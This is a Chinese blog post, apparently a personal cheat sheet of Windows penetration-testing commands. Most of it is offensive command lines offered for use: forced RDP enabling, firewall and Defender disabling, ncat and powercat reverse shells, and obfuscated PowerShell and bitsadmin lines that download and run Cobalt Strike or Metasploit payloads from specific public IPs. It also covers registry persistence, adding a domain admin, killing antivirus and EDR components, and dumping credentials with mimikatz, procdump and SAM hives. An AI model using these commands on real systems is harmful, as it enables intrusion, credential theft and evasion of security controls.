Windows渗透常用指令
windows快捷指令
强开3389
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
cmd强开3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
或
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
查找rdp端口(16进制转10进制)
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
开启guest
net user guest /active:yes
根据进程id查找调用位置
wmic process get name,executablepath,processid|findstr 15148
Vbs实现隐藏cmd窗口
CreateObject("WScript.Shell").Run "D:\syncthing\syncthing.exe",0
2012后更改注册表实现明文存储
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
关闭防火墙
netsh advfirewall set allprofiles state off [[关闭防⽕墙]]
Windows命令远程下载文件
certutil -urlcache -split -f http://<target_ip>/1.exe c:/users/public/1.exe
将exe转为txt以绕过防护
certutil -encode main.exe main.txt
将txt转回exe
certutil -decode main.txt main.exe
windows查看文件hash
certutil -hashfile 文件.zip(默认SHA1)
certutil -hashfile 文件.zip md5
certutil -hashfile 文件.zip SHA1
certutil -hashfile 文件.zip SHA256
linux查看文件hash
sha1sum 文件.zip
// 也可以这样
sha1sum test.txt test2.txt test3.txt > hash.sha1(将三个文件的hash值一一对应存入文件)
sha224sum test.txt
sha256sum test.txt
sha512sum test.txt
md5sum test.txt
windows关闭Defender
gpedit.msc
找到windows Defender选项
管理模板-windows组件-windows defender防病毒程序
windows反弹shell
在线工具推荐:https://www.revshells.com/
NC反弹shell
ncat -e cmd.exe 192.168.174.129 8080
powershell执行报错解决
set-ExecutionPolicy RemoteSigned
powershell反弹shell(cmd)
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.43.167 -p 1616 -e cmd
powershell反弹shell(powershell)
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://49.234.81.168:1910/powercat.ps1'); powercat -c 154.91.164.166 -p 1717 -e powershell
cs/msf快捷上线指令
Powershell cs/msf一句话上线免杀1
cmd /c echo set-alias -name xz -value IEX;x^z (New-Object "Ne`T.WeB`ClienT").d^o^w^n^l^o^a^d^s^t^r^i^n^g('ht'+'tP://19’+'2.168.190.12'+'8/a') | p^o^w^e^r^s^h^e^l^l -
IEX ((new-object net.webclient).downloadstring('http://103.239.103.252:9985/avv'))
cs直接生成2
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://103.239.103.252:80/Seting'))"
cs直接生成3
cmd /c echo set-alias -name xz -value IEX;xz (New-Object "NeT.WeBClienT").downloadstring('http://103.225.196.143:80/a') | powershell -
powershell远程调用上线
powershell set-alias -name test -value Invoke-Expression;test(New-Object Net.WebClient).DownloadString('http://103.225.196.143:80/1.ps1')
Windows注册表自启动项,权限维持
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "123" /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f
域查询相关指令
查看域管用户
net group "domain admins" /domain
查看域普通用户
net group "domain users" /domain
创建用户并加入域管理组
net user adminer admin@123 /add /domain [[添加域用户密码为admin]]@123
net group "domain admins" adminer /add /domain [[将域用户添加到域管理员组domain]] admins中
如果计算机名很多的时候可以用下面这条批量获取主机ip
@echo off
setlocal ENABLEDELAYEDEXPANSION
@FOR /F "usebackq eol=- skip=1 delims=\" %%j IN (`net view ^| find "命令成功完成" /v ^|find "The command completed successfully." /v`) DO (
@FOR /F "usebackq delims=" %%i IN (`@ping -n 1 -4 %%j ^| findstr "Pinging"`) DO (
@FOR /F "usebackq tokens=2 delims=[]" %%k IN (`echo %%i`) DO (echo %%k %%j)
)
)
mshta上线
mshta http://aa.bb.com/aaa.hta
cmd.exe /c bitsadmin /transfer 9b10 http://103.239.103.252:35786/uytra %APPDATA%\9b10.exe&%APPDATA%\9b10.exe&del %APPDATA%\9b10.exe
IEX ((new-object net.webclient).downloadstring('http://103.239.103.252:23454/ggytr'))
SMB端口工具利用指令
wmiexec使用hash连接
proxychains python3 wmiexec.py -hashes LM:NTLM EPSDB/Administrator@192.168.7.209
python3 wmiexec.py -hashes LM:NTLM EPSDB/Administrator@192.168.7.209
IPC基本连接指令 - 使用账号密码进行ipc连接
net use \\<target-ip>\ipc$ "password" /user:"administrator"
查看共享策略
net share
删除所有远程连接
net use * /del
查看远程主机C盘
dir \\<target-ip>\c$
将远程主机c盘挂载至本地的f盘
net use f: \\<target-ip>\c$
windows信息收集
常用信息收集
ipconfig
net user
netstart -ano
ver
systeminfo
tasklist /svc
taskkill -PID pid
taskkill /im qq.exe
whoami
# 关闭360(无用)
TASKKILL /F /IM ZhuDongFangYu.exe
TASKKILL /F /IM 360rps.exe
TASKKILL /F /IM 360tray.exe
TASKKILL /F /IM 360sd.exe
TASKKILL /F /IM 360sd.exe
TASKKILL /F /IM 360leakfixer.exe
TASKKILL /F /IM 360rp.exe
# 添加用户进管理员组
net localgroup administrators admins /add
# 查看域
net view /domain
mimikatz基本使用
读取hash到文件中:
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >1.txt
Procdump64 dump hash
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump zz.zz.dmp" "sekurlsa::logonPasswords full" "exit"
RDP绕过深信服EDR
删除文件:
C:Program Files/Sangfor/EDR/agent/bin/sfrdpverify.exe
内网存活扫描-主机发现
windows:
for /L %i in (0,1,255) do for /L %u in (0,1,255) do ping -n 1 -w 60 10.20.%i.%u | find "回复" >>pingall.txt
linux:
for ip in `seq 1 255`
do
{
ping -c 1 192.168.$ip.1 >/dev/null 2>&1
if [ $? -eq 0 ];then
echo 192.168.$ip.1 UP
else
echo 192.168.$ip.1 DOWN
fi
}&
done
wait
利用SQL Server主机发现
PowerShell -Command
"[System.Data.Sql.SqlDataSourceEnumerator]::Instance.GetDataSources()"
Windows下载文件
利用js下载
windows 全版本都会默认支持 js,并且通过cscript 来调用达到下载 payload 的目的。
使用js下载文件(需要写入对应文件)
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
WScript.Echo(WinHttpReq.ResponseText);
运行则下载文件
cscript /nologo downfile.js http://192.168.1.115/robots.txt
利用bitsadmin
自 windows7 以上版本内置 bitsadmin,它可以在网络不稳定的状态下下载文件,出错会自动重试,在比较复杂的网络环境下,有着不错的性能。
bitsadmin /rawreturn /transfer down "http://192.168.1.115/robots.txt" E:\PDF\robots.txt
需要注意的是,bitsadmin要求服务器支持Range标头。
如果需要下载过大的文件,需要提高优先级。配合上面的下载命令。再次执行
bitsadmin /setpriority down foreground
如果下载文件在1-5M之间,需要时时查看进度。同样它也支持进度条。
bitsadmin /transfer down /download /priority normal "http://192.168.1.115/robots.txt" E:\PDF\robots.txt
利用powershell
基于System.Net.WebClient
$Urls = @()
$Urls += "http://192.168.1.115/robots.txt"
$OutPath = "E:\PDF\"
ForEach ( $item in $Urls) {
$file = $OutPath + ($item).split('/')[-1]
(New-Object System.Net.WebClient).DownloadFile($item, $file)
}
在 powershell 3.0以后,提供 wget 功能,既 Invoke-WebRequest
$url = "http://192.168.1.115/robots.txt"
$output = "C:\inetpub\robots.txt"
$start_time = Get-Date
Invoke-WebRequest -Uri $url -OutFile $output
Write-Output "Time : $((Get-Date).Subtract($start_time).Seconds) second(s)"
使用一句话
powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://192.168.1.115/robots.txt','E:\robots.txt')
Hash提取
利用reg最小化获取hash
reg save HKLM\SYSTEM sys.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv
下载这三个文件,使用impacket 的 secretsdump.py
python /root/impacket/examples/secretsdump.py ‐sam sam.hiv ‐security security.hiv ‐system sys.hiv LOCAL
域信息收集
network info
ipconfig /all
system info
systeminfo
查看路由表
route print
进程收集
tasklist /svc //查看所有进程
tasklist /v //查看进程启动的用户
taskkill /f /PID //关闭某个pid的进程
wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState,pathToSignedProductExe //查看本机杀软
服务收集
wmic product get name,version
tasklist /svc
wmic service list brief //服务信息收集
查看计划任务
schtasks /query
查看当前登录域及域用户
net config workstation
确定域
net time /domain
运行 net time /domain 该命令后,一般会有如下三种情况:
1.存在域,但当前用户不是域用户,提示说明权限不够
C:\Users>bypass>net time /domain
发生系统错误 5 拒绝访问。
2.存在域,并且当前用户是域用户
C:\Users\Administrator>net time /domain
\\dc.test.com 的当前时间是 2020/10/23 21:18:37 命令成功完成。
3.当前网络环境为工作组,不存在域
C:\Users\Administrator>net time /domain
找不到域 WORKGROUP 的域控制器。
查看域控制器
net group "Domain Controllers" /domain
查看域内组
net group /domain
查看域管理员组
net group "Domain Admins" /domain
查看域用户组
net user /domain
查看域内用户详细信息
net user bypass /domain
wmic useraccount get /all 查看域用户详情
查看指定域内用户详细信息
net user bypass /domain:dog
查询域内置本地管理员组用户
net localgroup administrators /domain
查看域内主机
net view
net view /domain:dog //查看指定域内主机列表
本文来自博客园,作者:江城子!,转载请注明原文链接:https://www.cnblogs.com/clearun1112/p/17817347.html
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· winform 绘制太阳,地球,月球 运作规律
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 上周热点回顾(3.3-3.9)